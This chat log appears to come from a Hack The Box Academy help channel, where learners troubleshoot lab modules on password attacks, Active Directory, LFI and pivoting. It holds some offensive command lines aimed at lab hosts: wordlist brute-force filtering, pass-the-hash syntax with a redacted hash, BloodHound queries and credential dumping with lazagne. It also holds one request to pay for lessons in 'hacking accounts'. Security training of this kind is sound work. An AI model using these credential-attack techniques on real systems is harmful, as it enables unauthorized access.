okay, then the File should be here: /usr/share/wordlists/rockyou.txt

and here: /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

Thank you so it is the one that seems to go on forever with [error] child...

Huh used both already, will try again

Thank you for your assistance

hi everyone. Not trying to thread hijack or anything, But im having an issue with HTB Academy. My option to load the target box isnt there anymore. I've looked up the VPN troubleshooting, but nothing helped. Anyone have any ideas?

Maybe that specific exercise doesn't need a target

The Attacks & Defense module is broken. The PKI - ESC1 segment cannot be answered because the PKI machine does not boot up

It does. It was there 2 days ago. Im working on Linux Fundamentals and most of them have the need for target boxes.

Ope. Ok. Thank you. I'll check other ones and see if its the same way

Oh nah my boy. That one doesn’t have a targeted system. It’s something you have to look up within terminal

oh! Ok. thank you. I have a lot to learn. Thank you all for the replies

Thank you for the help.

I have been stumped for a few hours now this morning and last night on the footprinting medium lab. I have the first set of credentials but I cant get any further now.

If you landed on the target machine you may want start the enumeration again. I have used some PowerShell to help me

hey anyone having some troubles with the 3rd host in the live engagement section on the shells & payloads module ?
the ethernalblue is failing ? when tracing it back it can't write to the coruptted buffer

Anyone solved this issue ?

i've tried cahnging the payload

@zatoich1#3252

Hey guys, I'm stuck on the HArd Lab of "Firewall and IDS/IPS Evasion"... I made the firsts two without any problem but this one... Anyone for an advice?

Try all the evasion techniques they give you

BROKEN AUTHENTICATION Predictable Reset Token question 1. Why is it causing me so much trouble? If anyone can spare a moment...

Hey, as mentioned in the note you've to wait for 7-8 minutes before requesting the certificate.

this does not work for my brute force attack.

module 57, section 515

how do we play the hackthebox machine

how do we connect and stuff

Thanks ! I tested everything in order again and found THE port I think 🙂

how do i connect to a machine from my kali linux

download the VPN file and sudo openvpn <VPN_FILE>

qhere do i find the VPn file

after i spawn the machine

look for a button "Download VPN connection file". If you want to learn hacking, you have toobe a little bit more curious and try to figure out things by your own

Im new to hackthbox i usually train with vids like cybrary

no one?

...

Hello guys for the "Password attacks" session "Hunting Credential in Linux" , the hint gave me username and password which is Kira and LoveYou1 but when I ssh given username and password it says password is wrong am I doing something wrong here?

Perhaps the user has had the opportunity to change the password a bit

BROKEN AUTHENTICATION: Predictable Reset Token, question 1.
I have tried through vpn and the pwnbox,
have tried multiple time options,
I've made several adustments to the reset script,
I am out of ideas as to why its not working.

Hacking WordPress - Skill Assessment
I cannot access http://blog.inlanefreight.local and cannot move forward with the skills assessment. Am I doing something wrong?

You need to add an entry in your hosts file to access it

local is not a TLD that has been approved by IANA. Therefore it cannot be resolved by the root nameservers.
Here you can find a list of all approved TLDs
https://www.iana.org/domains/root/db

anyone

dude. people do this out of the kindness of their heart, whenever theyre online.
patience is a virtue. go do something else

Hey anyone has done the shells&payload module ?

what exactly is the problem?

no matter what happens i never get the right token

can anyone help me with the shared object hijacking lab in Linux privilege escalation?

@mystic light I asked yesterday too and there has been no response. I am working on other things, it just bothers me that I can't solve that one.

i don't even know what your question is

@glacial hazel BROKEN AUTHENTICATION: Predictable Reset Token, question 1.
I have tried through vpn and the pwnbox,
have tried multiple time options,
I've made several adustments to the reset script,
I am out of ideas as to why its not working.

The token must be calculated based on the server time

is not the server time the time it shows in the browser when you reset token?

i think so, yes

What exactly is the problem?

it goes through the 2000 possibilities for the +- 1 sec around that time to no sucess

To be exact, 1767 people have done it

Anyone please help me

Then you may have composed the token incorrectly.

You need to create your own password list based on the password you found.

I think the problem is that I don’t figure out where I have to copy the c code in. They talk about the dbquery but I don’t find this file and now I create my own file but it’s doesn’t work. I think I don’t understand this message “We can compile a shared object which includes
this function”

this question?
Follow the examples in this section to escalate privileges, recreate all examples (don't just run the payroll binary). Practice using ldd and readelf. Submit the version of glibc (i.e. 2.30) in use to move on to the next section

Hey everyone, I am going through the Information Security Foundations path, when adding an SSH key to a VPS, do you also add the username@devicename bit at the end or do you delete that?

?

What do you mean

Are you trying to connect to a server using a private key?

yes

Are you talking about a file named id_rsa.pub?

hello guys

yes that

Submit the version of glibc
|| https://dev.to/0xbf/how-to-get-glibc-version-c-lang-26he ||

You just need to append the contents of the id_rsa.pub file to the authorized_keys file in the .ssh directory in the home directory of the user you want to login as on the server

thanks a lot I try

So the username@device of the VPS I am trying to connect to?

don’t touch anything in the file

Just copy it the contents of the file like I said

ohhhhhhhhh I see what your saying

ye

vultr makes you copy paste the key so I was confused

AD enumeration & attacks, privilaged access, 1st question, the command on bloodhount ||MATCH p1=shortestPath((u1:User)-[r1:MemberOf1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote1..]->(c:Computer) RETURN p2|| provided by the module does not work, and as the module shows, this is the only was to solve the question, do i need to log in bloodhount as another user?

Active Directory Enumeration Skills Assessment Part 2. I used secretsdump.py on the sam hives and got hash INLAN___.LOCAL/Adm_____:$DCC2$10240#Adm_______#33______<A HASH HERE>__________________ can I pass this hash to logon by using: proxychains /v:172.16.7.__ /u:INLAN___.LOCAL/Adm_____ /pth:"$DCC2$10240#Adm_______#33______<A HASH HERE>__________________" I'm not sure if my syntax is wrong, or I just can't pass the hash this way.

I don't recall having to change users there.

i rdp'd as htb-student in the spawned target ip, i then open bloodhount and paste this command in the raw querry field and i get "no data returned from query"

Hi, i am stuck in Broken Authentication - Skill Assessment. Im trying bruteforce password for ||support.us|| user using the next wordlist
||cat /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt | grep '^[A-Z].*[0-9]$' | grep -E '[$#@]' | grep '[a-z]' | grep -E '^.{20,29}$'||, any hint?

if you haven't imported the data from sharphound, then the query will not work

the module doesnt mention anything about importing data from sharphount, how can i import data from sharphount?

You need to run it, then you will be presented with a zip file of the findings which you can import

cool, thank you very much

same module, last question, do i need to do anything before i attempt to use mssqlclient? what am i missing? i get timed out, im using this command: ||mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth|| the question asks me to connect this ip

i tried running powershell and sql commands on PowerUpSQL but they did not work

Howdy! I am currently having a problem with the IMAP/POP3 segment of the Footprinting module.

The problem is, I logged in to the email of the provided credentials via email client Evolution ||since all I get for credentials in the directions is robin:robin, I can't tell if the email is robin@inlanefreight.htb or robin.dev@dev.inlanefreight.htb so I used both||. Kicker is, when I try to refresh the inbox/drafts, there are no emails (when I am pretty sure there are supposed to be emails of some sort, per the directions).

If I may ask, and if y'all know, may you kindly help me amidst this predicament? Thanks for reading, and I hope y'all have a grand day! (also if you do respond, may I kindly ask that you ping me?)

sorry, I just realized that I needed to exit and reenter the email client (how silly). I thank you all for reading again, and hope y'all have a high quality day!

Hey guys, I’ve been trying to troubleshoot this for the last two hours. I’m trying to replicate the example from “Pivoting, Tunneling & Port Forwarding – Meterpreter Tunneling & Port Forwarding”, but no matter what I do, I can’t seem to get a shell. Can anyone spot where I’m going wrong?

Hi @gritty sundial I just read through that you complete the LFI skills assessment. I have been successful up to a point with this module. I can read the /etc/passwd, I can read the nginx access log, and I have successfully been able to add poison as the user agent. when I try adding the shell code it fails and the access log dies. Mostly I suspect from having the double quote in there breaking the format of the log. I have tried URL encoding it as well with no success. So I guess I am asking for a small hint. what am I missing here. any help would be greatly appreciated.

Lport in your payload doesn't seem to match the lport from your meterpreter session

I'd suggest rereading the section top to bottom

The port forward should redirect any traffic incoming from 1234 to 8081

It's exactly the same as the example in the section

Ok then it may be your msfvenom payload

Try remaking it

But like I said it could have been something simply overlooked

i did multiple times for the last 2 hours lol

Cause it looks like in that screenshot the shell.exe didn't finish crafting

Try putting LPORT before the -f and -o flags

Just tried, still nothing...

Hmm I didn't have issues. Not at my computer to double check. It could be that for some reason the autoroute didn't catch the final target IP

That's what i was thinking but i've even tried adding the host's exact address 172.16.5.19/23 instead of the subnet

Double check you're using the right ip

I've gone through every single command double checking the ip's

i dont get it 😦

¯_(ツ)_/¯

Try resetting the lab and rerunning the commands

done it about 5 times

Hmm

Active Directory Skills Assessment 2, I'm on the question where you try and move from SQL01 to MS01. I have system level access on SQL01 and used that to copy the sam files and use impacket-secretsdump to get the domain login hashes for "Administrator" account and ms-----c accounts. I also got the cleartext password for the ms-----c account. I've been trying to pass the Administrator hash to login to MS01 but I can't seem to figure out how. Am I going down the wrong path here?

hey, can anyone tell me , why i am not able to connect support team .

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

well if one set of credentials doesn't work, what about the other one?

same, same... were you able to find the solution?

dm me if you want. I can take a look

anyone please?

If I may ask, I have a slight predicament with DNS in the Footprinting module. If I may, when you brute force the subdomain, what is the best wordlist to use, or what did y'all use if I may ask? Thanks for reading, and I hope y'all have a lively day!

I can get back on MS01 with ms______c, it seems to be low privilege too though. I thought maybe I should be trying to use the Administrator hash there. I'll poke around with the other account. Thanks!

someone can help me in password attacks pass the hash section last question

there is no way i can get the reverse shell

sure, dm me

@heady tusk MUCH THANKS!

Currently at "Password attacks / Credential Hunting in Linux".
The question is "Examine the target and find out the password of the user Will. Then, submit the password as the answer.".

Do I need to get access to the system before or am I missing a step how to examine the target? On the windows modules we always had the credentials.

SecLists has some pretty good ones with increasing size. those are probably your best bet

HEJ szukam kogoś kto zna się na hakowaniu kont i ogólnie kto by mógł mnie nauczyć fajnych rzeczy (moge zapłacić)
💣
HEY I'm looking for someone who knows about hacking accounts and who can teach me cool things(I can pay)

what is the error why pass the hash not wroking?

yes, you do need access to the machine and yes they didn't give you any credentials for that

https://academy.hackthebox.com/

Alright. Was just wondering, normally it says "Find a way to gain access to the system" or something like that so I was afraid I was missing something. But now I know and will find a way. Thanks 🙂

good luck 🙂

for password attacks proctected archived. am I supposed to use rockyou.txt to crack the zip file?

this module got me confused. they never mention when u need to use which password list, the one they provided or mutated one or rockyou or some otheerr...

think of it as a real-life engagement and try whatever comes to your mind

thats the goal of the modules, to teach you to think and understand what you need to do to go to the next step

even sometimes that be head banging or a breeze

do you mind me asking, what is that htb season tag?

playing the machines through the season on the main platform

Hi all
module : documentation and reporting
section : skill assessment
i found an admin password (Hxxx0) on the DEV01 host in a file. But its not working. I am very confuse with it.
Just want to know if it is normal or not 😅
thanks all 🙂

Hello need help on Kerberos Attacks Constrained Delegation - Users section. I basically follow the steps but I get an error when I try to use psexec

what is the error

Errno Connection Error name or service not known

have you added the domain to your hosts file?

I followed all the steps correctly even using the pwnbox

Yes

take a screenshot of the hosts file

Hydra

anyone had problem connecting to msf reverse tcp using vpn config? (using pwnbox everything fine)

I am doing the following module: https://academy.hackthebox.com/module/113/section/2139. During the course they tell you to Dump Memory to File. there is no such option?

Intro to Network Traffic Analysis module, Tcpdump fundementals. "Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)" this is the only question i haven't got in the whole module. Like I know what switch i need to read .pcap files AND to read them with ASCII. And if i use them both to read a .pcap file it works but when i enter them in as the answer it doesn't.

go to memory map

@spiral pelican I am, from there I am selecting the 3000

paste again the screenshot, without the flag in the background

there is

you need to right click those trucks or sth. cant remember

aww got it! @woeful ermine @spiral pelican Thanks!

np

I do think, they should clarify it better

no one for this Q ? 😅

the format of the double quotes seems funny

try export without quote (")

Windows Priv Esc Assessment part I: Find the password for the ldapadmin account somewhere on the system.

I have ran every search variable POSSIBLE, I cannot for the life of me find this flag.

or remove your " in the wordlist arg in the cmd

It's getting wrapped in quotes twice. But I'm not sure if that's the issue.

it is a txt file and start with c

did you try some tools ?

yeah i used lazagne also

just replace them with new quotes, the current once seem to be from word (times new roman or similar)

Did you copy paste the gobuster command?

We can see them. Might be some problem at your end.

what cmd did you use for lazagne ?

.\lazagne.exe all

idk?

hi, is someone available to talk about https://academy.hackthebox.com/module/144/section/1256 please ?

Yea sure @keen compass

I need some help regarding in module https://academy.hackthebox.com/module/19/section/106 Anyone I could ping?

I'm not able to upload screenshots here for some reason, so I can share screenshots in DM

try to get an admin access an relaunch the cmd 😜

thats annoying isn't that step 3 lol